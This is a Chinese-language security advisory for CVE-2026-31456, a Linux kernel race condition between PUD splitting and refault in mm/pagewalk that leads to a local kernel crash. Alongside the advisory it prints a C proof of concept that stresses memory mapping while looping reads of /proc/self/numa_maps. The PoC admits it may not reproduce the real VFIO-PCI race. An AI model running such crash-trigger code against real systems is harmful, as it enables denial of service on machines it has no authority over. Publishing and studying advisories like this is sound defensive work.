CVE-2026-31456 CVSS 4.7 中危

CVE-2026-31456 Linux内核竞态条件漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31456

漏洞类型

竞态条件

CVSS评分

4.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的mm/pagewalk组件中存在安全漏洞，涉及并发拆分和refault之间的竞态条件。在`walk_pud_range()`中拆分PUD条目时，可能与并发线程对PUD叶子条目的refault操作发生竞争，导致尝试遍历已消失的PMD范围，从而触发内核BUG和系统崩溃。

技术细节

该漏洞发生在Linux内核的内存管理子系统。当VFIO-PCI设置DMA（特别是`vfio_pin_pages_remote`调用）时，若同时读取进程的numa_maps，会触发此竞态。`walk_pud_range()`在拆分PUD时未对PUD条目进行稳定性校验，导致在`walk_pgd_range`中访问无效地址（如`ffffa23980000000`），引发Oops。修复方案是在`walk_pmd_range()`中使用`pudp_get()`获取稳定快照，若PUD不存在或为叶子节点，则通过`ACTION_AGAIN`重试，而非继续向下遍历，以此同步`walk_pte_range()`的重试逻辑。

攻击链分析

STEP 1

攻击者获取本地低权限访问权限。

STEP 2

攻击者触发系统进行大块内存分配或VFIO-PCI DMA设置，涉及PUD页表项的操作。

STEP 3

并发线程读取进程的/proc/[pid]/numa_maps文件，触发内核页表遍历。

STEP 4

在walk_pud_range拆分PUD与refault操作之间发生竞态条件。

STEP 5

内核访问无效内存地址，触发BUG或Oops，导致系统崩溃（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31456
 * Triggering race condition in mm/pagewalk by reading numa_maps
 * while stressing memory allocation.
 * This attempts to reproduce the crash by creating a large mapping
 * and concurrently reading /proc/self/numa_maps.
 * Compilation: gcc -o poc CVE-2026-31456.c -lpthread
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>

void* trigger_page_walk(void* arg) {
    char buffer[256];
    int fd;
    // Continuously read numa_maps to trigger walk_page_range
    // This exercises the vulnerable path walk_pud_range
    while(1) {
        fd = open("/proc/self/numa_maps", O_RDONLY);
        if (fd >= 0) {
            while (read(fd, buffer, sizeof(buffer)) > 0);
            close(fd);
        }
    }
    return NULL;
}

int main() {
    pthread_t t1;
    size_t len = 1UL << 30; // Allocate 1GB to encourage PUD usage
    void *addr;
    volatile char *p;

    printf("[+] Starting PoC for CVE-2026-31456\n");

    // Create a large anonymous mapping
    addr = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (addr == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }

    printf("[+] Mapped memory at %p\n", addr);

    // Start thread to stress the page walk mechanism
    pthread_create(&t1, NULL, trigger_page_walk, NULL);

    // Main thread touches pages to potentially trigger refaults/splits
    // Note: Reproducing the exact VFIO-PCI race might require specific hardware,
    // but this stresses the mm/pagewalk logic.
    while(1) {
        p = (char *)addr;
        // Touch start and end of the region
        p[0] = 1;
        p[len-4096] = 1;
        usleep(1000);
    }

    return 0;
}

影响范围

Linux Kernel (Versions prior to commit 9bbbebd94dd5be25ec8c899d46ef01b33d5d22c0)

Linux Kernel (Versions prior to commit 3b89863c3fa482912911cd65a12a3aeef662c250)

Linux Kernel (Versions prior to commit 38ec58670a0c5fc1edabdeccd857e586b7b3f318)

防御指南

临时缓解措施

限制非特权用户对VFIO设备的访问权限，或限制对/proc/[pid]/numa_maps的读取操作，直至内核完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表